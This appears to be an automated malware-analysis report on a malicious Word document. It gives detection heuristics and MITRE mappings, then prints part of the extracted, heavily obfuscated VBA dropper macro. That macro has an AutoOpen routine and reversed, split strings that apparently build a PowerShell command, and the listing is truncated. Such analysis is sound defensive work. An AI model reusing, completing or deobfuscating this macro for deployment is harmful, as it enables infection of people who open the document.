MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an intent to execute external commands or download additional payloads. The ClamAV detection name 'Doc.Dropper.Agent-6544907-0' further supports its role as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6544907-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6544907-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 133012 bytes |
SHA-256: 597832bdd9b1b62845e37a630ac7b8cd97a43422f028ed490f44b860bf3e6ef1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VWLjDIbk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub IJwrW(QlvRS)
aYILD = UqtPLN
pKjFj = EBWClw
jEbsHH = QptXj + Sgn(89850 - dJUsz - ohAjjP + Fix(48548)) - 26850 - CDbl(38574)
WWMXu = 30203
End Sub
Sub BIDAm(RJYlSb)
BJoMrC = rLriw
lXATXi = tTktk
hiaHd = mcCMi + Sgn(121 - sLYpQV - pOuIE + Fix(27279)) - 76675 - CDbl(26470)
hZucpU = 41658
DNcMU = KRTrmC
iTYiM = oRDPS
dVnoX = YpHlDs + Sgn(81107 - jjqkW - LdDGV + Fix(88226)) - 56366 - CDbl(1639)
wAwJnr = 24888
dwBON = sQjsr
FbSsRN = RjTdM
IIlFj = dTLNo + Sgn(41922 - wPLqpB - ObXhFs + Fix(49702)) - 82186 - CDbl(91529)
KSorEF = 14527
End Sub
Sub wpNSu(iXfPl)
qdcbI = kDzrcm
UCWhu = JDfsMY
hJCiMK = pAjpN + Sgn(66717 - VDLFM - uZLIpk + Fix(41455)) - 54469 - CDbl(5139)
lPCNA = 51410
RiShi = WjULW
zUmzzA = wusco
mpvZKU = uDtbt + Sgn(86587 - FpbUY - oCrwQF + Fix(25609)) - 86080 - CDbl(54508)
ZBdEw = 58381
End Sub
Sub Autoopen()
On Error Resume Next
GKqAsw = KFEoBJ
XDqoj = wJEHdS
UZQoQb = UKhwv + Sgn(12233 - nKBZq - mBwnQ + Fix(23670)) - 61292 - CDbl(57346)
FjWazG = 71437
wYkGjVYTazT (QYauwN + jSPwbUmOsOi + rsdiJ)
DimzKT = dXDvkX
wbVGK = UkAQY
odvXiz = wBAjb + Sgn(77904 - JMsUfJ - IWQXWX + Fix(13009)) - 60446 - CDbl(36051)
WaXiwh = 535
End Sub
Sub zQaCw(tSWsHs)
lPMfGf = MZNRjS
BRILi = zhtzFY
iDAOX = BlKKz + Sgn(84780 - AIXCJ - ffsBO + Fix(63787)) - 56324 - CDbl(1752)
DWMZhG = 41906
ZzuJR = qGITbr
Jqqmtt = CmjuZU
ozZKwi = wCPKND + Sgn(3342 - FNBJpu - WnoNjF + Fix(74476)) - 36128 - CDbl(99658)
zuBIjI = 61073
rLobb = pkIjTs
inJbl = iutLj
aQJAl = EVwwi + Sgn(82580 - LIYzzG - HUSGrh + Fix(95557)) - 73840 - CDbl(95127)
zzELB = 30020
End Sub
Sub kWKOWT(ESjZOK)
vFkIFz = IEYSY
AjmjKs = PbvlkA
BYAXYn = BtUDw + Sgn(34907 - bSlvwp - UjzPVS + Fix(61720)) - 40258 - CDbl(19023)
YELBjD = 1479
End Sub
Attribute VB_Name = "lGwqSfNaOnIKpl"
Sub GjsCI(UqhjV)
rHcsPk = NihiN
CvEsM = JmtEUq
srQPR = zAWTm + Sgn(91340 - ZoXcYC - kFHQwU + Fix(68832)) - 22637 - CDbl(85494)
CHBOsJ = 94600
End Sub
Function jSPwbUmOsOi()
On Error Resume Next
QXPRj = RwTaVO
jRLPm = zRwXlH
Riuih = aJHfPS + Sgn(49951 - wBAJqd - VppwFY + Fix(94794)) - 2513 - CDbl(38015)
iJIKn = 5500
KmiqD = AjQfAf
TOOjho = OzYzi
rMQVR = qoGqTs + Sgn(53765 - wHITp - SpiEhj + Fix(54075)) - 79660 - CDbl(1358)
NlIlj = 78017
KzjzSSpDjr = cHWlzB("dsMC2'C'+'+wKCxe'+'.w'+'K'+'C( '+'+ '+'Bo", 72130 + 2 - 72130, 72130 + 35 - 72130)
vODoI = YvrFX
HpEIE = BhMnhU
ntcij = iJoNFl + Sgn(78763 - cGIqi - QsXId + Fix(7929)) - 73555 - CDbl(64223)
GHjjn = 40354
jVZJwr = sWfuv
wOJhmH = donZk
awrPtz = TTEZTJ + Sgn(70184 - uqFbd - PlGjWF + Fix(65639)) - 41751 - CDbl(90881)
AYNQKB = 14509
ADoAmP = cHWlzB("G9JIHnApSNAwi'+' + '+'wKChsQwKC '+'+ cilbup'+':v'+'ne'+'A'+'wi ='+' C'+'DS'+'A'+'wi;)'+'wK'+'C'+'@'+'w'+'KC(ti'+'lp'+j", 38650 + 2 - 38650, 38650 + 109 - 38650)
zFOfKk = cXBjw
zGzLLk = WrIwXW
uwUts = TiYXkb + Sgn(43828 - tijmz - CRNFwQ + Fix(53778)) - 29586 - CDbl(12347)
QHnKTf = 6105
oSZGB = XYLRrK
ZcocOf = AKXVS
nfAzzD = oTrVAU + Sgn(4290 - dwzls - TJwQjE + Fix(27846)) - 48237 - CDbl(59212)
EoNIsX = 27642
afSAfAJzrp = cHWlzB("W3L55 ECAlpER- 43]Rahc[,)96]Rahc[+58]Rahc[+86]Rahc[( ECALPERc- 93]Rahc[,'wKC' ECALPERc-63]Rahc[,)56]Rahc[+911]Rahc[+501]Rahc[( ECAlpER-)'}}{hcta'+'c};kaer'+'b'+';)CDSAwi'+S", 15763 + 2 - 15763, 15763 + 170 - 15763)
ncsFk = cudsX
ZjZFU = BjOzT
owQMG = hFhdwP + Sgn(80544 - Yfopb - CQVVO + Fix(15124)) - 76841 - CDbl(42132)
hFoJd = 32607
jlcnC = tGYmj
rutwD = WGNNL
EAJAo = MHUIj + Sgn(51975 - FJvYhF - zUjjK + Fix(13346)) - 12194 - CDbl(74624)
NKTZY = 68314
RiuGZqIUWQv = cHWlzB("NFG828'+'oD'+'EUD.UY'+'YAwi{y'+'rt'+'{'+')'+'XCDAAwi'+' ni '+'cfsa'+EWi", 75913 + 4 - 75913, 75913 + 64 - 75913)
CsRBa = qiLSIw
ahfIz = jTcph
ZlHwP = OVItj + Sgn(30090 - mViwU - wHXvfi + Fix(21061)) - 50929 - CDbl(35447)
hZDkl = 1406
filaw =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.